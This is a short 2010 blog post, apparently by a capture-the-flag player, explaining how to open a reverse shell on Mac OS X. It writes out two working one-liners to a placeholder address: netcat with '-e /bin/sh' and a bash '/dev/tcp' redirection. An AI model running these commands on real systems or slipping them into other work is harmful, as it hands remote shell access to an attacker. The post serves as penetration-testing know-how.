Friday, March 19, 2010

Netcat on Mac OS X

netcat (nc) is a utility for opening arbitrary TCP and UDP connections. According to the nc manual, -e option specifies filename to exec after connect. Thus in general, we can easily make reverse shell by using this command:
nc <addr> <port> -e /bin/sh

However, nc on Mac does not have -e option. Instead, Mac has enabled their bash network redirection (/dev/tcp or /dev/udp). Thus, instead of using nc for reverse binding shell, we can simply use this command:
/bin/bash 0</dev/tcp/addr/port 1>&0 2>&0

Note this will not work on default Debian machines. You have to enable bash network redirection to use this.

Useful reference: http://shudder.daemonette.org/source/BashNP-Guide.txt

About

My photo
Hi, I am a PhD candidate at CMU. I was one of the founding members of PPP (Plaid Parliament of Pwning). I like programming in OCaml, F#, Haskell, and C++.